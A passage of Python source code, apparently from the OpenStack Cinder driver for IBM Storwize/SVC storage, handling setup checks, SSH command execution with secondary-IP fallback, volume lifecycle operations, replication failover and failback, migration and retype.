self._state['compression_enabled'] = (self._helpers.
compression_enabled())
# Get the available I/O groups
self._state['available_iogrps'] = (self._helpers.
get_available_io_groups())
# Get the iSCSI and FC names of the Storwize/SVC nodes
self._state['storage_nodes'] = self._helpers.get_node_info()
# Add the iSCSI IP addresses and WWPNs to the storage node info
self._helpers.add_iscsi_ip_addrs(self._state['storage_nodes'])
self._helpers.add_fc_wwpns(self._state['storage_nodes'])
# For each node, check what connection modes it supports. Delete any
# nodes that do not support any types (may be partially configured).
to_delete = []
for k, node in self._state['storage_nodes'].items():
if ((len(node['ipv4']) or len(node['ipv6']))
and len(node['iscsi_name'])):
node['enabled_protocols'].append('iSCSI')
self._state['enabled_protocols'].add('iSCSI')
if len(node['WWPN']):
node['enabled_protocols'].append('FC')
self._state['enabled_protocols'].add('FC')
if not len(node['enabled_protocols']):
to_delete.append(k)
for delkey in to_delete:
del self._state['storage_nodes'][delkey]
# Build the list of in-progress vdisk copy operations
if ctxt is None:
admin_context = context.get_admin_context()
else:
admin_context = ctxt.elevated()
volumes = self.db.volume_get_all_by_host(admin_context, self.host)
for volume in volumes:
metadata = self.db.volume_admin_metadata_get(admin_context,
volume['id'])
curr_ops = metadata.get('vdiskcopyops', None)
if curr_ops:
ops = [tuple(x.split(':')) for x in curr_ops.split(';')]
self._vdiskcopyops[volume['id']] = ops
# if vdiskcopy exists in database, start the looping call
if len(self._vdiskcopyops) >= 1:
self._vdiskcopyops_loop = loopingcall.FixedIntervalLoopingCall(
self._check_volume_copy_ops)
self._vdiskcopyops_loop.start(interval=self.VDISKCOPYOPS_INTERVAL)
LOG.debug('leave: do_setup')
# v2 replication setup
self._do_replication_setup()
def _validate_pools_exist(self):
# Validate that the pool exists
pools = self.configuration.storwize_svc_volpool_name
for pool in pools:
try:
self._helpers.get_pool_attrs(pool)
except exception.VolumeBackendAPIException:
msg = _('Failed getting details for pool %s.') % pool
raise exception.InvalidInput(reason=msg)
def check_for_setup_error(self):
"""Ensure that the flags are set properly."""
LOG.debug('enter: check_for_setup_error')
# Check that we have the system ID information
if self._state['system_name'] is None:
exception_msg = (_('Unable to determine system name.'))
raise exception.VolumeBackendAPIException(data=exception_msg)
if self._state['system_id'] is None:
exception_msg = (_('Unable to determine system id.'))
raise exception.VolumeBackendAPIException(data=exception_msg)
# Make sure we have at least one node configured
if not len(self._state['storage_nodes']):
msg = _('do_setup: No configured nodes.')
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
if self.protocol not in self._state['enabled_protocols']:
# TODO(mc_nair): improve this error message by looking at
# self._state['enabled_protocols'] to tell user what driver to use
raise exception.InvalidInput(
reason=_('The storage device does not support %(prot)s. '
'Please configure the device to support %(prot)s or '
'switch to a driver using a different protocol.')
% {'prot': self.protocol})
required_flags = ['san_ip', 'san_ssh_port', 'san_login',
'storwize_svc_volpool_name']
for flag in required_flags:
if not self.configuration.safe_get(flag):
raise exception.InvalidInput(reason=_('%s is not set.') % flag)
# Ensure that either password or keyfile were set
if not (self.configuration.san_password or
self.configuration.san_private_key):
raise exception.InvalidInput(
reason=_('Password or SSH private key is required for '
'authentication: set either san_password or '
'san_private_key option.'))
opts = self._helpers.build_default_opts(self.configuration)
self._helpers.check_vdisk_opts(self._state, opts)
LOG.debug('leave: check_for_setup_error')
def _run_ssh(self, cmd_list, check_exit_code=True, attempts=1):
cinder_utils.check_ssh_injection(cmd_list)
command = ' '.join(cmd_list)
if not self.sshpool:
try:
self.sshpool = self._set_up_sshpool(self.configuration.san_ip)
except paramiko.SSHException:
LOG.warning(_LW('Unable to use san_ip to create SSHPool. Now '
'attempting to use storwize_san_secondary_ip '
'to create SSHPool.'))
if self.configuration.storwize_san_secondary_ip is not None:
self.sshpool = self._set_up_sshpool(
self.configuration.storwize_san_secondary_ip)
else:
LOG.warning(_LW('Unable to create SSHPool using san_ip '
'and not able to use '
'storwize_san_secondary_ip since it is '
'not configured.'))
raise
try:
return self._ssh_execute(self.sshpool, command,
check_exit_code, attempts)
except Exception:
# Need to check if creating an SSHPool storwize_san_secondary_ip
# before raising an error.
if self.configuration.storwize_san_secondary_ip is not None:
if (self.sshpool.ip ==
self.configuration.storwize_san_secondary_ip):
LOG.warning(_LW("Unable to execute SSH command with "
"storwize_san_secondary_ip. "
"Attempting to switch IP back "
"to san_ip %s."),
self.configuration.san_ip)
self.sshpool = self._set_up_sshpool(
self.configuration.san_ip)
return self._ssh_execute(self.sshpool, command,
check_exit_code, attempts)
else:
LOG.warning(_LW("Unable to execute SSH command. "
"Attempting to switch IP to %s."),
self.configuration.storwize_san_secondary_ip)
self.sshpool = self._set_up_sshpool(
self.configuration.storwize_san_secondary_ip)
return self._ssh_execute(self.sshpool, command,
check_exit_code, attempts)
else:
LOG.warning(_LW('Unable to execute SSH command. '
'Not able to use '
'storwize_san_secondary_ip since it is '
'not configured.'))
with excutils.save_and_reraise_exception():
LOG.error(_LE("Error running SSH command: %s"),
command)
def _set_up_sshpool(self, ip):
password = self.configuration.san_password
privatekey = self.configuration.san_private_key
min_size = self.configuration.ssh_min_pool_conn
max_size = self.configuration.ssh_max_pool_conn
sshpool = ssh_utils.SSHPool(
ip,
self.configuration.san_ssh_port,
self.configuration.ssh_conn_timeout,
self.configuration.san_login,
password=password,
privatekey=privatekey,
min_size=min_size,
max_size=max_size)
return sshpool
def _ssh_execute(self, sshpool, command,
check_exit_code = True, attempts=1):
try:
with sshpool.item() as ssh:
while attempts > 0:
attempts -= 1
try:
return processutils.ssh_execute(
ssh,
command,
check_exit_code=check_exit_code)
except Exception as e:
LOG.error(_LE('Error has occurred: %s'), e)
last_exception = e
greenthread.sleep(random.randint(20, 500) / 100.0)
try:
raise processutils.ProcessExecutionError(
exit_code=last_exception.exit_code,
stdout=last_exception.stdout,
stderr=last_exception.stderr,
cmd=last_exception.cmd)
except AttributeError:
raise processutils.ProcessExecutionError(
exit_code=-1,
stdout="",
stderr="Error running SSH command",
cmd=command)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE("Error running SSH command: %s"), command)
def ensure_export(self, ctxt, volume):
"""Check that the volume exists on the storage.
The system does not "export" volumes as a Linux iSCSI target does,
and therefore we just check that the volume exists on the storage.
"""
volume_defined = self._helpers.is_vdisk_defined(volume['name'])
if not volume_defined:
LOG.error(_LE('ensure_export: Volume %s not found on storage.'),
volume['name'])
def create_export(self, ctxt, volume, connector):
model_update = None
return model_update
def remove_export(self, ctxt, volume):
pass
def _get_vdisk_params(self, type_id, volume_type=None,
volume_metadata=None):
return self._helpers.get_vdisk_params(self.configuration,
self._state, type_id,
volume_type=volume_type,
volume_metadata=volume_metadata)
def create_volume(self, volume):
opts = self._get_vdisk_params(volume['volume_type_id'],
volume_metadata=
volume.get('volume_metadata'))
pool = utils.extract_host(volume['host'], 'pool')
self._helpers.create_vdisk(volume['name'], str(volume['size']),
'gb', pool, opts)
if opts['qos']:
self._helpers.add_vdisk_qos(volume['name'], opts['qos'])
model_update = None
ctxt = context.get_admin_context()
rep_type = self._get_volume_replicated_type(ctxt, volume)
# The replication V2 has a higher priority than the replication V1.
# Check if V2 is available first, then check if V1 is available.
if rep_type:
self.replications.get(rep_type).volume_replication_setup(ctxt,
volume)
model_update = {'replication_status': 'enabled'}
elif opts.get('replication'):
model_update = self.replication.create_replica(ctxt, volume)
return model_update
def delete_volume(self, volume):
ctxt = context.get_admin_context()
rep_mirror_type = self._get_volume_replicated_type_mirror(ctxt,
volume)
rep_status = volume.get("replication_status", None)
if rep_mirror_type and rep_status != "failed-over":
self.replications.get(rep_mirror_type).delete_target_volume(
volume)
self._helpers.delete_vdisk(volume['name'], False)
if volume['id'] in self._vdiskcopyops:
del self._vdiskcopyops[volume['id']]
if not len(self._vdiskcopyops):
self._vdiskcopyops_loop.stop()
self._vdiskcopyops_loop = None
def create_snapshot(self, snapshot):
ctxt = context.get_admin_context()
try:
source_vol = self.db.volume_get(ctxt, snapshot['volume_id'])
except Exception:
msg = (_('create_snapshot: get source volume failed.'))
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
pool = utils.extract_host(source_vol['host'], 'pool')
opts = self._get_vdisk_params(source_vol['volume_type_id'])
self._helpers.create_copy(snapshot['volume_name'], snapshot['name'],
snapshot['volume_id'], self.configuration,
opts, False, pool=pool)
def delete_snapshot(self, snapshot):
self._helpers.delete_vdisk(snapshot['name'], False)
def create_volume_from_snapshot(self, volume, snapshot):
if volume['size'] != snapshot['volume_size']:
msg = (_('create_volume_from_snapshot: Source and destination '
'size differ.'))
LOG.error(msg)
raise exception.InvalidInput(message=msg)
opts = self._get_vdisk_params(volume['volume_type_id'],
volume_metadata=
volume.get('volume_metadata'))
pool = utils.extract_host(volume['host'], 'pool')
self._helpers.create_copy(snapshot['name'], volume['name'],
snapshot['id'], self.configuration,
opts, True, pool=pool)
if opts['qos']:
self._helpers.add_vdisk_qos(volume['name'], opts['qos'])
ctxt = context.get_admin_context()
rep_type = self._get_volume_replicated_type(ctxt, volume)
# The replication V2 has a higher priority than the replication V1.
# Check if V2 is available first, then check if V1 is available.
if rep_type and self._replication_enabled:
self.replications.get(rep_type).volume_replication_setup(ctxt,
volume)
return {'replication_status': 'enabled'}
elif opts.get('replication'):
replica_status = self.replication.create_replica(ctxt, volume)
if replica_status:
return replica_status
def create_cloned_volume(self, tgt_volume, src_volume):
"""Creates a clone of the specified volume."""
if src_volume['size'] > tgt_volume['size']:
msg = (_("create_cloned_volume: source volume %(src_vol)s "
"size is %(src_size)dGB and doesn't fit in target "
"volume %(tgt_vol)s of size %(tgt_size)dGB.") %
{'src_vol': src_volume['name'],
'src_size': src_volume['size'],
'tgt_vol': tgt_volume['name'],
'tgt_size': tgt_volume['size']})
LOG.error(msg)
raise exception.InvalidInput(message=msg)
opts = self._get_vdisk_params(tgt_volume['volume_type_id'],
volume_metadata=
tgt_volume.get('volume_metadata'))
pool = utils.extract_host(tgt_volume['host'], 'pool')
self._helpers.create_copy(src_volume['name'], tgt_volume['name'],
src_volume['id'], self.configuration,
opts, True, pool=pool)
# The source volume size is equal to target volume size
# in most of the cases. But in some scenario, the target
# volume size may be bigger than the source volume size.
# SVC does not support flashcopy between two volumes
# with two different size. So use source volume size to
# create target volume first and then extend target
# volume to orginal size.
if tgt_volume['size'] > src_volume['size']:
# extend the new created target volume to expected size.
self._extend_volume_op(tgt_volume, tgt_volume['size'],
src_volume['size'])
if opts['qos']:
self._helpers.add_vdisk_qos(tgt_volume['name'], opts['qos'])
ctxt = context.get_admin_context()
rep_type = self._get_volume_replicated_type(ctxt, tgt_volume)
# The replication V2 has a higher priority than the replication V1.
# Check if V2 is available first, then check if V1 is available.
if rep_type and self._replication_enabled:
self.replications.get(rep_type).volume_replication_setup(
ctxt, tgt_volume)
return {'replication_status': 'enabled'}
elif opts.get('replication'):
replica_status = self.replication.create_replica(ctxt, tgt_volume)
if replica_status:
return replica_status
def extend_volume(self, volume, new_size):
self._extend_volume_op(volume, new_size)
def _extend_volume_op(self, volume, new_size, old_size=None):
LOG.debug('enter: _extend_volume_op: volume %s', volume['id'])
ret = self._helpers.ensure_vdisk_no_fc_mappings(volume['name'],
allow_snaps=False)
if not ret:
msg = (_('_extend_volume_op: Extending a volume with snapshots is '
'not supported.'))
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
if old_size is None:
old_size = volume['size']
extend_amt = int(new_size) - old_size
ctxt = context.get_admin_context()
rep_mirror_type = self._get_volume_replicated_type_mirror(ctxt,
volume)
rep_status = volume.get("replication_status", None)
target_vol_name = None
if rep_mirror_type and rep_status != "failed-over":
try:
rel_info = self._helpers.get_relationship_info(volume)
self._helpers.delete_relationship(volume)
except Exception as e:
msg = (_('Failed to get remote copy information for '
'%(volume)s. Exception: %(err)s.'), {'volume':
volume['id'],
'err': e})
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
if rel_info:
target_vol_name = rel_info.get('aux_vdisk_name')
self.replications.get(rep_mirror_type).extend_target_volume(
target_vol_name, extend_amt)
self._helpers.extend_vdisk(volume['name'], extend_amt)
if rep_mirror_type and rep_status != "failed-over":
self.replications.get(rep_mirror_type).create_relationship(
volume, target_vol_name)
LOG.debug('leave: _extend_volume_op: volume %s', volume['id'])
def add_vdisk_copy(self, volume, dest_pool, vol_type):
return self._helpers.add_vdisk_copy(volume, dest_pool,
vol_type, self._state,
self.configuration)
def _add_vdisk_copy_op(self, ctxt, volume, new_op):
metadata = self.db.volume_admin_metadata_get(ctxt.elevated(),
volume['id'])
curr_ops = metadata.get('vdiskcopyops', None)
if curr_ops:
curr_ops_list = [tuple(x.split(':')) for x in curr_ops.split(';')]
new_ops_list = curr_ops_list.append(new_op)
else:
new_ops_list = [new_op]
new_ops_str = ';'.join([':'.join(x) for x in new_ops_list])
self.db.volume_admin_metadata_update(ctxt.elevated(), volume['id'],
{'vdiskcopyops': new_ops_str},
False)
if volume['id'] in self._vdiskcopyops:
self._vdiskcopyops[volume['id']].append(new_op)
else:
self._vdiskcopyops[volume['id']] = [new_op]
# We added the first copy operation, so start the looping call
if len(self._vdiskcopyops) == 1:
self._vdiskcopyops_loop = loopingcall.FixedIntervalLoopingCall(
self._check_volume_copy_ops)
self._vdiskcopyops_loop.start(interval=self.VDISKCOPYOPS_INTERVAL)
def _rm_vdisk_copy_op(self, ctxt, volume, orig_copy_id, new_copy_id):
try:
self._vdiskcopyops[volume['id']].remove((orig_copy_id,
new_copy_id))
if not len(self._vdiskcopyops[volume['id']]):
del self._vdiskcopyops[volume['id']]
if not len(self._vdiskcopyops):
self._vdiskcopyops_loop.stop()
self._vdiskcopyops_loop = None
except KeyError:
LOG.error(_LE('_rm_vdisk_copy_op: Volume %s does not have any '
'registered vdisk copy operations.'), volume['id'])
return
except ValueError:
LOG.error(_LE('_rm_vdisk_copy_op: Volume %(vol)s does not have '
'the specified vdisk copy operation: orig=%(orig)s '
'new=%(new)s.'),
{'vol': volume['id'], 'orig': orig_copy_id,
'new': new_copy_id})
return
metadata = self.db.volume_admin_metadata_get(ctxt.elevated(),
volume['id'])
curr_ops = metadata.get('vdiskcopyops', None)
if not curr_ops:
LOG.error(_LE('_rm_vdisk_copy_op: Volume metadata %s does not '
'have any registered vdisk copy operations.'),
volume['id'])
return
curr_ops_list = [tuple(x.split(':')) for x in curr_ops.split(';')]
try:
curr_ops_list.remove((orig_copy_id, new_copy_id))
except ValueError:
LOG.error(_LE('_rm_vdisk_copy_op: Volume %(vol)s metadata does '
'not have the specified vdisk copy operation: '
'orig=%(orig)s new=%(new)s.'),
{'vol': volume['id'], 'orig': orig_copy_id,
'new': new_copy_id})
return
if len(curr_ops_list):
new_ops_str = ';'.join([':'.join(x) for x in curr_ops_list])
self.db.volume_admin_metadata_update(ctxt.elevated(), volume['id'],
{'vdiskcopyops': new_ops_str},
False)
else:
self.db.volume_admin_metadata_delete(ctxt.elevated(), volume['id'],
'vdiskcopyops')
def promote_replica(self, ctxt, volume):
return self.replication.promote_replica(volume)
def reenable_replication(self, ctxt, volume):
return self.replication.reenable_replication(volume)
def create_replica_test_volume(self, tgt_volume, src_volume):
if src_volume['size'] != tgt_volume['size']:
msg = (_('create_cloned_volume: Source and destination '
'size differ.'))
LOG.error(msg)
raise exception.InvalidInput(message=msg)
replica_status = self.replication.test_replica(tgt_volume,
src_volume)
return replica_status
def get_replication_status(self, ctxt, volume):
replica_status = None
if self.replication:
replica_status = self.replication.get_replication_status(volume)
return replica_status
def _check_volume_copy_ops(self):
LOG.debug("Enter: update volume copy status.")
ctxt = context.get_admin_context()
copy_items = list(self._vdiskcopyops.items())
for vol_id, copy_ops in copy_items:
try:
volume = self.db.volume_get(ctxt, vol_id)
except Exception:
LOG.warning(_LW('Volume %s does not exist.'), vol_id)
del self._vdiskcopyops[vol_id]
if not len(self._vdiskcopyops):
self._vdiskcopyops_loop.stop()
self._vdiskcopyops_loop = None
continue
for copy_op in copy_ops:
try:
synced = self._helpers.is_vdisk_copy_synced(volume['name'],
copy_op[1])
except Exception:
LOG.info(_LI('_check_volume_copy_ops: Volume %(vol)s does '
'not have the specified vdisk copy '
'operation: orig=%(orig)s new=%(new)s.'),
{'vol': volume['id'], 'orig': copy_op[0],
'new': copy_op[1]})
else:
if synced:
self._helpers.rm_vdisk_copy(volume['name'], copy_op[0])
self._rm_vdisk_copy_op(ctxt, volume, copy_op[0],
copy_op[1])
LOG.debug("Exit: update volume copy status.")
# #### V2.1 replication methods #### #
def failover_host(self, context, volumes, secondary_id=None):
"""Force failover to a secondary replication target."""
self._validate_replication_enabled()
if self.FAILBACK_VALUE == secondary_id:
# In this case the administrator would like to fail back.
volume_update_list = self._replication_failback(context,
volumes)
return None, volume_update_list
# In this case the administrator would like to fail over.
failover_target = None
for target in self._replication_targets:
if target['backend_id'] == secondary_id:
failover_target = target
break
if not failover_target:
msg = _("A valid secondary target MUST be specified in order "
"to failover.")
LOG.error(msg)
raise exception.InvalidReplicationTarget(reason=msg)
target_id = failover_target['backend_id']
volume_update_list = []
for volume in volumes:
rep_type = self._get_volume_replicated_type(context, volume)
if rep_type:
replication = self.replications.get(rep_type)
if replication.target.get('backend_id') == target_id:
# Check if the target backend matches the replication type.
# If so, fail over the volume.
try:
replication.failover_volume_host(context,
volume, target_id)
volume_update_list.append(
{'volume_id': volume['id'],
'updates': {'replication_status': 'failed-over'}})
except exception.VolumeDriverException:
msg = (_LE('Unable to failover to the secondary. '
'Please make sure that the secondary '
'back-end is ready.'))
LOG.error(msg)
volume_update_list.append(
{'volume_id': volume['id'],
'updates': {'replication_status': 'error'}})
else:
# If the volume is not of replicated type, we need to
# force the status into error state so a user knows they
# do not have access to the volume.
volume_update_list.append(
{'volume_id': volume['id'],
'updates': {'status': 'error'}})
return target_id, volume_update_list
def _is_host_ready_for_failback(self, ctxt, volumes):
valid_sync_status = ('consistent_synchronized', 'consistent_stopped',
'synchronized', 'idling')
# Check the status of each volume to see if it is in
# a consistent status.
for volume in volumes:
rep_type = self._get_volume_replicated_type(ctxt, volume)
if rep_type:
replication = self.replications.get(rep_type)
if replication:
status = replication.get_relationship_status(volume)
# We need to make sure of that all the volumes are
# in the valid status to trigger a successful
# fail-back. False will be be returned even if only
# one volume is not ready.
if status not in valid_sync_status:
return False
else:
return False
else:
return False
return True
def _replication_failback(self, ctxt, volumes):
"""Fail back all the volume on the secondary backend."""
if not self._is_host_ready_for_failback(ctxt, volumes):
msg = _("The host is not ready to be failed back. Please "
"resynchronize the volumes and resume replication on the "
"Storwize backends.")
LOG.error(msg)
raise exception.VolumeDriverException(data=msg)
volume_update_list = []
for volume in volumes:
rep_type = self._get_volume_replicated_type(ctxt, volume)
if rep_type:
replication = self.replications.get(rep_type)
replication.replication_failback(volume)
volume_update_list.append(
{'volume_id': volume['id'],
'updates': {'replication_status': 'enabled'}})
else:
volume_update_list.append(
{'volume_id': volume['id'],
'updates': {'status': 'available'}})
return volume_update_list
def _validate_replication_enabled(self):
if not self._replication_enabled:
msg = _("Issuing a fail-over failed because replication is "
"not properly configured.")
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
def _validate_volume_rep_type(self, ctxt, volume):
rep_type = self._get_volume_replicated_type(ctxt, volume)
if not rep_type:
msg = (_("Volume %s is not of replicated type. "
"This volume needs to be of a volume type "
"with the extra spec replication_enabled set "
"to '<is> True' to support replication "
"actions."), volume['id'])
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
if not self._replication_enabled:
msg = _("The back-end where the volume is created "
"does not have replication enabled.")
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
return rep_type
def _get_volume_replicated_type_mirror(self, ctxt, volume):
rep_type = self._get_volume_replicated_type(ctxt, volume)
if rep_type in self.VALID_REP_TYPES:
return rep_type
else:
return None
def _get_specs_replicated_type(self, volume_type):
replication_type = None
extra_specs = volume_type.get("extra_specs", {})
rep_val = extra_specs.get('replication_enabled')
if rep_val == "<is> True":
replication_type = extra_specs.get('replication_type',
self.GLOBAL)
# The format for replication_type in extra spec is in
# "<in> global". Otherwise, the code will
# not reach here.
if replication_type != self.GLOBAL:
# Pick up the replication type specified in the
# extra spec from the format like "<in> global".
replication_type = replication_type.split()[1]
if replication_type not in self.VALID_REP_TYPES:
replication_type = None
return replication_type
def _get_volume_replicated_type(self, ctxt, volume):
replication_type = None
if volume.get("volume_type_id"):
volume_type = volume_types.get_volume_type(
ctxt, volume["volume_type_id"])
replication_type = self._get_specs_replicated_type(volume_type)
return replication_type
def _do_replication_setup(self):
replication_devices = self.configuration.replication_device
if replication_devices:
replication_targets = []
for dev in replication_devices:
remote_array = {}
remote_array['managed_backend_name'] = (
dev.get('managed_backend_name'))
if not remote_array['managed_backend_name']:
raise exception.InvalidConfigurationValue(
option='managed_backend_name',
value=remote_array['managed_backend_name'])
rep_mode = dev.get('replication_mode')
remote_array['replication_mode'] = rep_mode
remote_array['san_ip'] = (
dev.get('san_ip'))
remote_array['backend_id'] = (
dev.get('backend_id'))
remote_array['san_login'] = (
dev.get('san_login'))
remote_array['san_password'] = (
dev.get('san_password'))
remote_array['pool_name'] = (
dev.get('pool_name'))
replication_targets.append(remote_array)
# Each replication type will have a coresponding replication.
self.create_replication_types(replication_targets)
if len(self._supported_replication_types) > 0:
self._replication_enabled = True
def create_replication_types(self, replication_targets):
for target in replication_targets:
rep_type = target['replication_mode']
if (rep_type in self.VALID_REP_TYPES
and rep_type not in self.replications.keys()):
replication = self.replication_factory(rep_type, target)
try:
replication.establish_target_partnership()
except exception.VolumeDriverException:
msg = (_LE('The replication mode of %(type)s has not '
'successfully established partnership '
'with the replica Storwize target %(stor)s.'),
{'type': rep_type,
'stor': target['backend_id']})
LOG.error(msg)
continue
self.replications[rep_type] = replication
self._replication_targets.append(target)
self._supported_replication_types.append(rep_type)
def replication_factory(self, replication_type, rep_target):
"""Use replication methods for the requested mode."""
if replication_type == self.GLOBAL:
return storwize_rep.StorwizeSVCReplicationGlobalMirror(
self, rep_target, StorwizeHelpers)
if replication_type == self.METRO:
return storwize_rep.StorwizeSVCReplicationMetroMirror(
self, rep_target, StorwizeHelpers)
def migrate_volume(self, ctxt, volume, host):
"""Migrate directly if source and dest are managed by same storage.
We create a new vdisk copy in the desired pool, and add the original
vdisk copy to the admin_metadata of the volume to be deleted. The
deletion will occur using a periodic task once the new copy is synced.
:param ctxt: Context
:param volume: A dictionary describing the volume to migrate
:param host: A dictionary describing the host to migrate to, where
host['host'] is its name, and host['capabilities'] is a
dictionary of its reported capabilities.
"""
LOG.debug('enter: migrate_volume: id=%(id)s, host=%(host)s',
{'id': volume['id'], 'host': host['host']})
false_ret = (False, None)
dest_pool = self._helpers.can_migrate_to_host(host, self._state)
if dest_pool is None:
return false_ret
ctxt = context.get_admin_context()
volume_type_id = volume['volume_type_id']
if volume_type_id is not None:
vol_type = volume_types.get_volume_type(ctxt, volume_type_id)
else:
vol_type = None
self._check_volume_copy_ops()
new_op = self.add_vdisk_copy(volume['name'], dest_pool, vol_type)
self._add_vdisk_copy_op(ctxt, volume, new_op)
LOG.debug('leave: migrate_volume: id=%(id)s, host=%(host)s',
{'id': volume['id'], 'host': host['host']})
return (True, None)
def retype(self, ctxt, volume, new_type, diff, host):
"""Convert the volume to be of the new type.
Returns a boolean indicating whether the retype occurred.
:param ctxt: Context
:param volume: A dictionary describing the volume to migrate
:param new_type: A dictionary describing the volume type to convert to
:param diff: A dictionary with the difference between the two types
:param host: A dictionary describing the host to migrate to, where
host['host'] is its name, and host['capabilities'] is a
dictionary of its reported capabilities.
"""
def retype_iogrp_property(volume, new, old):
if new != old:
self._helpers.change_vdisk_iogrp(volume['name'],
self._state, (new, old))
LOG.debug('enter: retype: id=%(id)s, new_type=%(new_type)s,'
'diff=%(diff)s, host=%(host)s', {'id': volume['id'],
'new_type': new_type,
'diff': diff,
'host': host})
no_copy_keys = ['warning', 'autoexpand', 'easytier']
copy_keys = ['rsize', 'grainsize', 'compression']
all_keys = no_copy_keys + copy_keys
old_opts = self._get_vdisk_params(volume['volume_type_id'],
volume_metadata=
volume.get('volume_matadata'))
new_opts = self._get_vdisk_params(new_type['id'],
volume_type=new_type)
# Check if retype affects volume replication
model_update = None
old_type_replication = old_opts.get('replication', False)
new_type_replication = new_opts.get('replication', False)
# Delete replica if needed
if old_type_replication and not new_type_replication:
self.replication.delete_replica(volume)
model_update = {'replication_status': 'disabled',
'replication_driver_data': None,
'replication_extended_status': None}
vdisk_changes = []
need_copy = False
for key in all_keys:
if old_opts[key] != new_opts[key]:
if key in copy_keys:
need_copy = True
break
elif key in no_copy_keys:
vdisk_changes.append(key)
if (utils.extract_host(volume['host'], 'pool') !=
utils.extract_host(host['host'], 'pool')):
need_copy = True
if need_copy:
self._check_volume_copy_ops()
dest_pool = self._helpers.can_migrate_to_host(host, self._state)
if dest_pool is None:
return False
# If volume is replicated, can't copy
if new_type_replication:
msg = (_('Unable to retype: Current action needs volume-copy,'
' it is not allowed when new type is replication.'
' Volume = %s'), volume['id'])
raise exception.VolumeDriverException(message=msg)
retype_iogrp_property(volume,
new_opts['iogrp'],
old_opts['iogrp'])
try:
new_op = self.add_vdisk_copy(volume['name'],
dest_pool,
new_type)
self._add_vdisk_copy_op(ctxt, volume, new_op)
except exception.VolumeDriverException:
# roll back changing iogrp property
retype_iogrp_property(volume, old_opts['iogrp'],
new_opts['iogrp'])
msg = (_('Unable to retype: A copy of volume %s exists. '
'Retyping would exceed the limit of 2 copies.'),
volume['id'])
raise exception.VolumeDriverException(message=msg)
else:
retype_iogrp_property(volume, new_opts['iogrp'], old_opts['iogrp'])
self._helpers.change_vdisk_options(volume['name'], vdisk_changes,
new_opts, self._state)
if new_opts['qos']:
# Add the new QoS setting to the volume. If the volume has an
# old QoS setting, it will be overwritten.
self._helpers.update_vdisk_qos(volume['name'], new_opts['qos'])
elif old_opts['qos']:
# If the old_opts contain QoS keys, disable them.
self._helpers.disable_vdisk_qos(volume['name'], old_opts['qos'])
# Add replica if needed
if not old_type_replication and new_type_replication:
model_update = self.replication.create_replica(ctxt, volume,
new_type)
LOG.debug('exit: retype: ild=%(id)s, new_type=%(new_type)s,'
'diff=%(diff)s, host=%(host)s', {'id': volume['id'],
'new_type': new_type,
'diff': diff,
'host': host['host']})
return True, model_update
def update_migrated_volume(self, ctxt, volume, new_volume,
original_volume_status):
"""Return model update from Storwize for migrated volume.
This method should rename the back-end volume name(id) on the
destination host back to its original name(id) on the source host.
:param ctxt: The context used to run the method update_migrated_volume
:param volume: The original volume that was migrated to this backend
:param new_volume: The migration volume object that was created on
this backend as part of the migration process
:param original_volume_status: The status of the original volume
:returns: model_update to update DB with any needed changes
"""
current_name = CONF.volume_name_template % new_volume['id']
original_volume_name = CONF.volume_name_template % volume['id']
try:
self._helpers.rename_vdisk(current_name, original_volume_name)
except exception.VolumeBackendAPIException:
LOG.error(_LE('Unable to rename the logical volume '
'for volume: %s'), volume['id'])
return {'_name_id': new_volume['_name_id'] or new_volume['id']}
# If the back-end name(id) for the volume has been renamed,
# it is OK for the volume to keep the original name(id) and there is
# no need to use the column "_name_id" to establish the mapping
# relationship between the volume id and the back-end volume
# name(id).
# Set the key "_name_id" to None for a successful rename.
model_update = {'_name_id': None}
return model_update
def manage_existing(self, volume, ref):
"""Manages an existing vdisk.
Renames the vdisk to match the expected name for the volume.
Error checking done by manage_existing_get_size is not repeated -
if we got here then we have a vdisk that isn't in use (or we don't
care if it is in use.
"""
# Check that the reference is valid
vdisk = self._manage_input_check(ref)
vdisk_io_grp = self._helpers.get_volume_io_group(vdisk['name'])
if vdisk_io_grp not in self._state['available_iogrps']:
msg = (_("Failed to manage existing volume due to "
"the volume to be managed is not in a valid "
"I/O group."))
raise exception.ManageExistingVolumeTypeMismatch(reason=msg)
if volume['volume_type_id']:
opts = self._get_vdisk_params(volume['volume_type_id'],
volume_metadata=
volume.get('volume_metadata'))
vdisk_copy = self._helpers.get_vdisk_copy_attrs(vdisk['name'], '0')
if vdisk_copy['autoexpand'] == 'on' and opts['rsize'] == -1:
msg = (_("Failed to manage existing volume due to "
"the volume to be managed is thin, but "
"the volume type chosen is thick."))
raise exception.ManageExistingVolumeTypeMismatch(reason=msg)
if not vdisk_copy['autoexpand'] and opts['rsize'] != -1:
msg = (_("Failed to manage existing volume due to "
"the volume to be managed is thick, but "
"the volume type chosen is thin."))
raise exception.ManageExistingVolumeTypeMismatch(reason=msg)
if (vdisk_copy['compressed_copy'] == 'no' and
opts['compression']):
msg = (_("Failed to manage existing volume due to the "
"volume to be managed is not compress, but "
"the volume type chosen is compress."))
raise exception.ManageExistingVolumeTypeMismatch(reason=msg)
if (vdisk_copy['compressed_copy'] == 'yes' and
not opts['compression']):
msg = (_("Failed to manage existing volume due to the "
"volume to be managed is compress, but "
"the volume type chosen is not compress."))
raise exception.ManageExistingVolumeTypeMismatch(reason=msg)
if vdisk_io_grp != opts['iogrp']:
msg = (_("Failed to manage existing volume due to "
"I/O group mismatch. The I/O group of the "
"volume to be managed is %(vdisk_iogrp)s. I/O group"
"of the chosen type is %(opt_iogrp)s.") %
{'vdisk_iogrp': vdisk['IO_group_name'],
'opt_iogrp': opts['iogrp']})
raise exception.ManageExistingVolumeTypeMismatch(reason=msg)
pool = utils.extract_host(volume['host'], 'pool')
if vdisk['mdisk_grp_name'] != pool:
msg = (_("Failed to manage existing volume due to the "
"pool of the volume to be managed does not "
"match the backend pool. Pool of the "
"volume to be managed is %(vdisk_pool)s. Pool "
"of the backend is %(backend_pool)s.") %
{'vdisk_pool': vdisk['mdisk_grp_name'],
'backend_pool':
self.configuration.storwize_svc_volpool_name})
raise exception.ManageExistingVolumeTypeMismatch(reason=msg)
self._helpers.rename_vdisk(vdisk['name'], volume['name'])
def manage_existing_get_size(self, volume, ref):
